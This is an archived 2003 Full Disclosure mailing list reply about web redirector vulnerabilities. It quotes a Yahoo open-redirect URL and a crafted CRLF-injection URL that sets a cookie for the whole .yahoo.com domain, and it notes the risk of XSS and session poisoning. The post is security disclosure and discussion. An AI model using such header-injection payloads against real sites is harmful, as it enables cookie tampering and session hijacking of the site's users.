Full Disclosure mailing list archives

Re: CERT: Vulnerability in web redirectors

From: David Leadbeater <dgl () dgl cx>
Date: Sat, 22 Mar 2003 21:19:16 +0000

Georgi Guninski wrote:

Like this one?:
--------------------
http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org
--------------------
(may be wrapped)


That site also demonstrates another issue with this type of HTTP Redirector
that has been mentioned as a security risk before:
http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org%0D%0ASet-cookie:%20foo%3D123%3B%%20domain%3D.yahoo.com%3B%20path%3D/

It adds a cookie for the whole .yahoo.com domain, this could be an attack
vector for other XSS (I wouldn't be surprised if there is less checking
done on cookie input) or session poisoning type attacks.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

CERT: Vulnerability in web redirectors hack4life (Mar 21)
- Re: CERT: Vulnerability in web redirectors Kurt Seifried (Mar 22)
  - Re: CERT: Vulnerability in web redirectors Georgi Guninski (Mar 22)
    - Re: CERT: Vulnerability in web redirectors David Leadbeater (Mar 22)
- <Possible follow-ups>
- Fw: CERT: Vulnerability in web redirectors http-equiv () excite com (Mar 22)